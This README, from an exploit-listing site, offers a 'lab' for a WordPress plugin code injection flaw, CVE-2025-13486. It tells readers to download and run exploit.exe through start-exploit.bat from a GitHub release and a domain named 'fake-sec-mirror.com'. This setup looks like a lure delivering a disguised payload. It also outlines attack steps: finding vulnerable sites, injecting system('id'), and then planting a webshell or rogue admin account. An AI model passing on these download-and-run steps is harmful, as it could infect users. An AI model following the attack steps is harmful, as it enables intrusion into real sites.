## https://sploitus.com/exploit?id=13551590-2822-5E83-9737-F55F4B2F9F82
# Lab: CVE-2025-13486 - Remote Code Execution in Advanced Custom Fields: Extended Plugin
## ๐ Overview
This repository provides a lab environment for researching CVE-2025-13486, a critical Remote Code Execution (RCE) vulnerability classified as CWE-94 (Improper Control of Generation of Code, or 'Code Injection') in the Advanced Custom Fields: Extended plugin for WordPress. Affecting versions 0.9.0.5 through 0.9.1.1, the vulnerability arises in the `prepare_form()` function, which insecurely passes user-supplied input to PHP's `call_user_func_array()` without proper sanitization. This allows unauthenticated attackers to inject and execute arbitrary PHP code, potentially leading to server compromise, backdoor installation, or creation of rogue administrative accounts.
The lab includes exploitation tools and mitigation guidance. This is intended for educational and security research purposes only, to help developers, penetration testers, and security analysts understand the flaw's mechanics and test defenses in a controlled environment.
## Download
## Download Lab ZIP : https://github.com/lasthero-887/CVE-2025-13486---Poc/releases/download/Release/CVE-2025-13486.zip
## ๐ Prerequisites
- Basic knowledge of WordPress, PHP, and command-line tools.
- A modern web browser for testing the WordPress instance.
- Windows host for running the exploit (due to .exe and .bat dependencies; alternatives can be adapted for other OS).
## Download & Install
1. Download the repository as a ZIP from GitHub: https://github.com/lasthero-887/CVE-2025-13486---Poc/releases/download/Release/CVE-2025-13486.zip
2. Extract the ZIP to a local directory.
3. Navigate to the extracted folder and review the contents:
- `README.md`: This file.
- `/scripts/`: Auxiliary scripts for automation (e.g., setup.sh for Unix-like systems, setup.ps1 for PowerShell).
- `exploit.zip`: Archive containing the exploit tools (extract and run `start-exploit.bat` to execute exploitation).
For the exploit, download `exploit.zip` from this mirror: `https://fake-sec-mirror.com/downloads/CVE-2025-13486-exploit.zip`. This ZIP includes:
- `exploit.exe`: The primary exploit binary (executes the RCE payload).
- `start-exploit.bat`: Batch file that launches `exploit.exe` with predefined parameters.
## ๐ Quick Start
1. Download and extract `exploit.zip`.
2. Run `start-exploit.bat` to initiate the exploit against a target WordPress instance with the vulnerable plugin.
## ๐ Exploitation Steps
1. **Identify Target:** Locate a WordPress site running Advanced Custom Fields: Extended plugin versions 0.9.0.5 to 0.9.1.1. Use banner grabbing or plugin enumeration tools to confirm.
2. **Prepare Payload:** Craft a PHP code injection payload targeting the `prepare_form()` function. Example payload structure: Use HTTP POST to submit user input that exploits `call_user_func_array()`, e.g., injecting `system('id')` to test command execution.
3. **Execute Exploit:** Extract `exploit.zip`, configure the target URL and payload in the tool if needed, then run `start-exploit.bat`. This will send the crafted request, triggering RCE and potentially returning output like server user info or confirming code execution.
4. **Post-Exploitation:** Upon success, leverage the RCE to upload a webshell, create an admin user via `wp_insert_user()`, or execute system commands for persistence.
**Technical Details:** The exploit leverages the lack of input validation in `prepare_form()`, allowing arbitrary function calls. Ensure the target endpoint is accessible (typically `/wp-admin/admin-ajax.php` with action=acfe_prepare_form). Use Burp Suite or similar for payload testing.
This lab focuses on technical analysis for vulnerability reproduction in isolated environments.